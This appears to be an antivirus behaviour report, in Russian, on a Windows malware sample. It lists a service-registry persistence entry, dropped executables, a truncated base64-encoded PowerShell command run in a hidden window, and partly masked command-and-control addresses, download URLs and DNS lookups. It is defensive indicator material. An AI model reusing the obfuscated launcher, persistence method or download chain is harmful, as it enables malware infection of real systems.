Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\admparse] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\admparse] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDEST\admparse.exe"'
- 'admparse' "%WINDIR%\SysWOW64\KBDEST\admparse.exe"
- 'admparse' %WINDIR%\SysWOW64\KBDEST\admparse.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe
- %WINDIR%\syswow64\kbdest\admparse.exe
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe в %WINDIR%\syswow64\kbdest\admparse.exe
- '19#.#58.216.73':80
- '85.##4.28.226':8080
- '14#.#4.137.67':443
- '16#.#41.242.173':8080
- http://ja##uh.nl/system/5UMD6dd/
- http://eq##am.de/cgi-bin/3y/
- http://si####ile.com.mx/DOC/FV/
- http://16#.###.242.173:8080/TfupmbwMvvfCik/ via 16#.#41.242.173
- DNS ASK ja##uh.nl
- DNS ASK eq##am.de
- DNS ASK si####ile.com.mx
- '%HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe'
- '%WINDIR%\syswow64\kbdest\admparse.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...' (со скрытым окном)